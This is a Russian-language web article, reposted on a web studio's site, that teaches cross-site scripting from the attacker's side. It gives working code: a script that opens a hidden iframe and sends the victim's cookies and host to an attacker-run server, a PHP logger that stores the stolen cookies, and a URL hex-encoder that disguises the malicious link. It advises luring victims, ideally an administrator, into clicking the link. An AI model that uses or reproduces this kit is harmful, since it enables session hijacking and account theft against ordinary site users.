XSS-атака. Общий подход.
Итак, сегодня поговорим об атаке XSS. Давайте для начала разберемся с этой аббревиатурой. Дело в том, что ее часто называют CSS, что может сбить с толку новичка. XSS образовано от английской фразы Cross Site Scripting, что дословно переводится как межсайтовый скрптинг. Отсюда видно, что верная аббревиатура CSS. Но CSS уже существует, она означает Cascading Style Sheets – каскадные таблицы стилей. Чтобы не возникало путаницы, принято межсайтовый скриптинг называть не CSS, а XSS. Это тип уязвимости системы, позволяющий внедрять в код страниц HTML-код. Этот тип уязвимости используется не для атаки сервера, а для атаки его пользователей, просматривающих зараженные страницы.
Чем может быть опасна возможность внедрять свой HTML-код? Сам по себе HTML-код не несет в себе опасности, так как возможностей там не так много. Для расширения его возможностей есть поддержка JavaScript – вот его-то и используют хакеры. Потому как JavaScript исполняется на стороне клиента, этот вид атаки направлен именно на клиентов, а не на сервер.
Смысл этой атаки заключается в том, чтобы узнать значения некоторых переменных у пользователя. А чаще всего, узнать хочется значения тех переменных, которые хранятся у пользователя в COOKIES'ах.
JavaScript позволяет получить доступ к COOKIES пользователя следующим образом:
| Quote |
| document.cookie |
Это мы учтем. Но мы не можем просто взять и попросить пользователя пройти по ссылке на наш web-сервер, где ему будет выдана страничка, считывающая все COOKIES. Чтобы пользователи так легко не были взломаны, предусмотрена следующая система:
- COOKIES’ы сортируются по сайтам, которые их установили пользователю
- Считать COOKIES определенного сайта (например, сайта www.site.ru) может только сайт, установивший ее (в данном случае, только www.site.ru)
Это нам сильно усложняет жизнь. Надо каким-то образом вставить код, отправляющий эти COOKIES нам, на том сайте, который имеет право на считывание этих COOKIES. Для этого мы ищем на сайте любые места, куда мы можем вставить свой HTML-код. Это могут быть как переменные, передаваемые в командной строке, так и любые другие, которые мы можем модифицировать. Где-нибудь на форумах или в чате это могут быть поля ввода сообщений, или же наш собственный ник. Например, можно ввести в качестве ника:
| Quote |
| mi<B>cr</B>on |
Если дальше в нике две средние буквы будут отображаться жирным шрифтом, значит в это поле можно внедрять свой HTML-код.
XSS можно условно разделить на 2 вида:
- Активные – при которых пользователь сразу зайдя на зараженную страницу, отправит нам свои данные.
- Пассивные – при которых от пользователя потребуются дополнительные действия. Например, надо будет нажать на специально модифицированную ссылку.
Давайте рассмотрим общий прием того, какой HTML-код следует вписывать на страницу. Для начала нам следует зарегистрировать сайт на каком-нибудь хостинге. Можно на бесплатном. Допустим, это будет myhost.hut.ru. На нем создаем файл file.js со следующим содержимым:
| Quote |
| document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://myhost.hut.ru/file.php'+'?host='+location.host+'&cook='+document.cookie+'"></iframe>'); |
Это и будет нашим атакующим кодом. А вызывать мы его будем путем вставки на уязвимую страницу следующего кода:
| Quote |
| <script src=http://myhost.hut.ru/file.js></script> |
Этот код открывает невидимый фрейм, в котором загружается файл http://myhost.hut.ru/file.php (ему передаются в переменных host и cook хост и COOKIES человека, который открыл страницу). Так как этот фрейм будет являться частью самой зараженной странички, он будет иметь доступ к COOKIES’ам этого сайта. Вот и сбылся наш план – мы запустили php-скрипт на нашем сервере и передали ему данные, полученные другим скриптом (на JavaScript). Самая сложная часть заканчивается. Теперь мы уже в спокойной обстановке у себя на сервере сохраним эти данные в файл. Для этого запишем в файл file.php следующий код:
| Quote |
|
<?
$file = fopen("cookies.txt","a"); fputs($file,"[".date("d.m.y H:i")."]: host=".$_GET[‘host’].", COOKIES=”.$_GET[‘cook’].”\r\n"); fclose($file); ?> |
Данный код предельно прост – записывает в файл cookies.txt полученные данные.
На этом вобщем-то и заканчивается вся техника. Если для того, чтобы запустить весь описанный механизм от пользователя требуется перейти по определенной ссылке, например:
| Quote |
| http://site.ru/info.php?login=<script src=http://myhost.hut.ru/file.js></script> |
то можно зашифровать часть строки (). Так как при переходе по этой ссылке, эта строка будет передаваться в адресной строке браузера, ее можно перевести в шестнадцатеричный код. Для этого можно написать несложный скрипт, пусть он будет называться encodeurl.php:
| Quote |
| <? $str = urldecode($_GET['str']); for($i=0;$i<strlen($str);$i++) { if($str[$i]=='&') { echo "$str[$i]"; } else { $hex=dechex(ord($str[$i])); echo "%$hex"; } } ?> |
И передадим ему параметром str ту часть строки, которую будем шифровать:
| Quote |
| http://myhost.hut.ru/encodeurl.php?str=<script src=http://myhost.hut.ru/file.js></script> |
Он выдаст нам следующий текст:
| Quote |
| %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f %2f%6d%79%68%6f%73%74%2e%68%75%74%2e%72%75%2f%66%69%6c%65%2e %6a%73%3e%3c%2f%73%63%72%69%70%74%3e |
Берем нашу специально модифицированную для атаки ссылку (http://site.ru/info.php?login=) и заменяем в ней часть строки на зашифрованную строку:
| Quote |
| http://site.ru/info.php?login=%3c%73%63%72%69%70%74%20%73%72%63%3d%68 %74%74%70%3a%2f%2f%6d%79%68%6f%73%74%2e%68%75%74%2e %72%75%2f%66%69%6c%65%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e |
Теперь в глаза не бросается вредоносный код. И мы смело можем упрашивать жертву зайти по этой ссылке. Либо разместить ее на форуме, где кто-нибудь ее нажмет (лучше всего, если это будет администратор 
Ну вот и все, пожалуй...
|
Итак, сегодня поговорим об атаке XSS. Давайте для начала разберемся с этой аббревиатурой. Дело в том, что ее часто называют CSS, что может сбить с толку новичка. XSS образовано от английской фразы |
РэдЛайн, создание сайта, заказать сайт, разработка сайтов, реклама в Интернете, продвижение, маркетинговые исследования, дизайн студия, веб дизайн, раскрутка сайта, создать сайт компании, сделать сайт, создание сайтов, изготовление сайта, обслуживание сайтов, изготовление сайтов, заказать интернет сайт, создать сайт, изготовить сайт, разработка сайта, web студия, создание веб сайта, поддержка сайта, сайт на заказ, сопровождение сайта, дизайн сайта, сайт под ключ, заказ сайта, реклама сайта, хостинг, регистрация доменов, хабаровск, краснодар, москва, комсомольск |
Дайджест новых статей по интернет-маркетингу на ваш email
Новые статьи и публикации
- 2025-10-29 » Как оценить эффективность работы SEO-специалиста: практическое руководство для маркетологов и владельцев бизнеса
- 2025-10-29 » Киберспорт как маркетинговый инструмент: стратегии привлечения геймеров
- 2025-10-29 » Как говорить с аудиторией о сложном
- 2025-10-29 » Что такое доказательства с нулевым разглашением (ZKP) и их роль в блокчейне
- 2025-10-29 » Инновации, рожденные в мире автогонок, нашли применение далеко за пределами трасс
- 2025-10-28 » Внедрение DMARC для защиты корпоративного домена от спуфинга
- 2025-10-27 » Цифровые привычки: повышаем качество жизни в цифровую эпоху
- 2025-10-27 » Как превратить негативные отзывы в инструмент роста: практическое руководство
- 2025-10-27 » NFT 2.0: новые стандарты токенов
- 2025-10-27 » Основные принципы DevOps
- 2025-10-27 » Искусственный общий интеллект: новая реальность следующего десятилетия
- 2025-10-24 » Технический долг: почему ИТ-проекты замедляются и выходят за рамки бюджета
- 2025-10-24 » Обратный отсчет для криптографии: когда квантовые компьютеры станут угрозой?
- 2025-10-24 » Цифровой детокс: необходимость, тренд или искусственная потребность?
- 2025-10-24 » Искусственный интеллект в SEO: новые правила борьбы за цифровое внимание
- 2025-10-24 » Страх упущенной выгоды (FOMO): как когнитивное искажение заставляет нас тратить и сожалеть
- 2025-10-10 » Взаимодействие и координация в условиях удалённой работы
- 2025-10-10 » Влияние технологий на концентрацию внимания: разбор исследования Microsoft
- 2025-10-10 » SSL и HTTPS: как обеспечить безопасность сайта и сохранить доверие клиентов
- 2025-10-10 » Персональные данные: где граница между заботой о клиенте и алгоритмическим контролем
- 2025-10-10 » Сложности управления данными в эпоху облачных технологий
- 2025-10-03 » Интеграция PIM и CRM: как ускорить продажи и сократить возвраты
- 2025-10-03 » Почему прозрачность решений ИИ — это вопрос, касающийся каждого
- 2025-10-03 » Ваша цифровая тень: что о вас знает сеть и как это используют
- 2025-10-03 » Роль айдентики в укреплении доверия к бренду
- 2025-10-03 » Эффективная аналитика для малого бизнеса: выбор инструментов
- 2025-09-26 » На войне все средства хороши? Суть и опасности черного PR
- 2025-09-26 » Цифровые двойники: от концепции к практической реализации в бизнесе
- 2025-09-26 » Признаки и опасность фейковых компаний
- 2025-09-26 » Преимущества единых онлайн-офисов для малого и среднего бизнеса
Не бойся быть ни как все и все захотят быть как ты! |
Мы создаем сайты, которые работают! Профессионально обслуживаем и продвигаем их !
Как мы работаем
Заявка
Позвоните или оставьте заявку на сайте.
Консультация
Обсуждаем что именно Вам нужно и помогаем определить как это лучше сделать!
Договор
Заключаем договор на оказание услуг, в котором прописаны условия и обязанности обеих сторон.
Выполнение работ
Непосредственно оказание требующихся услуг и работ по вашему заданию.
Поддержка
Сдача выполненых работ, последующие корректировки и поддержка при необходимости.
Мы создаем практически любые сайты от продающих страниц до сложных, высоконагруженных и нестандартных веб приложений! Наши сайты это надежные маркетинговые инструменты для успеха Вашего бизнеса и увеличения вашей прибыли! Мы делаем красивые и максимально эффектные сайты по доступным ценам уже много лет!
Комплексный подход это не просто продвижение сайта, это целый комплекс мероприятий, который определяется целями и задачами поставленными перед сайтом и организацией, которая за этим стоит. Время однобоких методов в продвижении сайтов уже прошло, конкуренция слишком высока, чтобы была возможность расслабиться и получать \ удерживать клиентов из Интернета, просто сделав сайт и не занимаясь им...
Мы оказываем полный комплекс услуг по сопровождению сайта: информационному и техническому обслуживанию и развитию Интернет сайтов.
Контекстная реклама - это эффективный инструмент в интернет маркетинге, целью которого является увеличение продаж. Главный плюс контекстной рекламы заключается в том, что она работает избирательно.
Хитрый план)